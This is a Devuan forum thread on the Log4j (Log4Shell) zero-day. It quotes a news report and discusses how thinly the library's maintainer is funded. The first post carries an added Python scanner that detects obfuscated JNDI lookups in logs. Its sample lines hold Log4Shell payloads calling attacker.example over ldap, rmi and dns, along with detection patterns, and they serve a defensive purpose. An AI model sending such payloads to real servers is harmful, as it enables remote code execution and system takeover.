The officially official Devuan Forum!


#1 2021-12-12 07:48:46

hevidevi
Member
Registered: 2021-09-17
Posts: 225  

Extremely Critical Log4J Vulnerability....

... Leaves Much of the Internet at Risk

One to keep an eye on!

2021-12-10 21:29
The Apache Software Foundation has released fixes to contain an actively exploited zero-day vulnerability affecting the widely-used Apache Log4j Java-based logging library that could be weaponized to execute malicious code and allow a complete takeover of vulnerable systems.

Log4j is used as a logging package in a variety of different popular software by a number of manufacturers, including Amazon, Apple iCloud, Cisco, Cloudflare, ElasticSearch, Red Hat, Steam, Tesla, Twitter, and video games such as Minecraft.

"The Apache Log4j zero-day vulnerability is probably the most critical vulnerability we have seen this year," said Bharat Jogi, senior manager of vulnerabilities and signatures at Qualys.

"Log4j is a ubiquitous library used by millions of Java applications for logging error messages. This vulnerability is trivial to exploit."

Web infrastructure company Cloudflare noted that it blocked roughly 20,000 exploit requests per minute around 6:00 p.m. UTC on Friday, with most of the exploitation attempts originating from Canada, the U.S., Netherlands, France, and the U.K. Given the ease of exploitation and prevalence of Log4j in enterprise IT and DevOps, in-the-wild attacks aimed at susceptible servers are expected to ramp up in the coming days, making it imperative to address the flaw immediately.

"This Log4j vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string," security expert Marcus Hutchins said in a tweet.

https://thehackernews.com/2021/12/extre … ility.html

Last edited by hevidevi (2021-12-12 07:50:49)

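The "special string" the quoted tweet refers to is a Log4j lookup embedded in attacker-controlled input that ends up in a log call. The scanner below is an added example for this thread, not code from the forum post, the quoted article, or the Log4j project. It assumes the publicly documented `${jndi:...}` lookup syntax and the nested-lookup tricks used to hide the `jndi` token (`${lower:j}`, `${::-j}`, `${env:NO_SUCH_VAR:-j}`); the access-log lines and the host `attacker.example` are constructed for the example. It statically collapses those nested lookups before matching, so a naive `grep jndi` miss is caught.

```python
import re
from typing import Iterable, List, Tuple

# Constructed sample access-log lines (not taken from the original post or article):
# one benign request, one plain JNDI lookup in the User-Agent, and two obfuscated
# variants that spell "jndi" through nested Log4j lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:18:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:18:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:18:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}i:rmi://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:18:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/c}"',
]

# An innermost lookup: "${...}" whose body contains no further "$", "{" or "}".
_INNERMOST_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A (possibly already de-obfuscated) JNDI lookup, e.g. "${jndi:ldap://host/x}".
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:[^}]*\}", re.IGNORECASE)


def _resolve_lookup(match: "re.Match") -> str:
    """Statically evaluate the lookups attackers use to hide the "jndi" token.

    Only lower/upper and the "${name:-default}" fallback are evaluated here;
    anything else, including the jndi lookup itself, is returned unchanged.
    """
    body = match.group(1)
    if body.lower().startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.lower().startswith("upper:"):
        return body[len("upper:"):].upper()
    # "${name:-default}" yields the default when the lookup fails, so both
    # "${::-j}" and "${env:NO_SUCH_VAR:-j}" evaluate to the literal "j".
    if ":-" in body:
        return body.split(":-", 1)[1]
    return match.group(0)


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse innermost lookups repeatedly until the string stops changing.

    max_rounds bounds the work on pathologically deep nesting.
    """
    for _ in range(max_rounds):
        new_text = _INNERMOST_LOOKUP.sub(_resolve_lookup, text)
        if new_text == text:
            break
        text = new_text
    return text


def find_jndi_lookups(line: str) -> List[str]:
    """Return every JNDI lookup found in the line after de-obfuscation."""
    return _JNDI_LOOKUP.findall(normalize_lookups(line))


def scan_log(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, normalized lookup) for each hit."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(lines, start=1):
        for payload in find_jndi_lookups(line):
            hits.append((lineno, payload))
    return hits


if __name__ == "__main__":
    for lineno, payload in scan_log(SAMPLE_LOG_LINES):
        print(f"line {lineno}: {payload}")
```

Running it prints the three malicious lines with the lookup reduced to its plain `${jndi:<scheme>://...}` form, which is what you would feed into blocklists or a SIEM rule. This is a triage aid, not a fix: the payload can arrive in any field an application logs, not just the User-Agent, and the only reliable remediation is upgrading Log4j to a fixed release as the quoted article says.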

#2 2021-12-12 08:43:58

Head_on_a_Stick
Member
From: London
Registered: 2019-03-24
Posts: 2,326  

Re: Extremely Critical Log4J Vulnerability....

Relevant:

dependency.png

The Log4j library is maintained by Ralph Goers who, up until this vulnerability, had a grand total of three donors for their project. Shameful.

See also https://ariadne.space/2021/12/11/to-sec … y-fund-it/

Last edited by Head_on_a_Stick (2021-12-12 08:45:49)


To obtain a root shell use su -. Using just su will result in "command not found" messages.


#3 2021-12-12 10:36:10

hevidevi
Member
Registered: 2021-09-17
Posts: 225  

Re: Extremely Critical Log4J Vulnerability....

Yeah, pretty shameful, HoaS, when this piece of software is used in over 3 billion devices or some such, so I've read from the Twitter page Ariadne shared.

log4shell.jpg
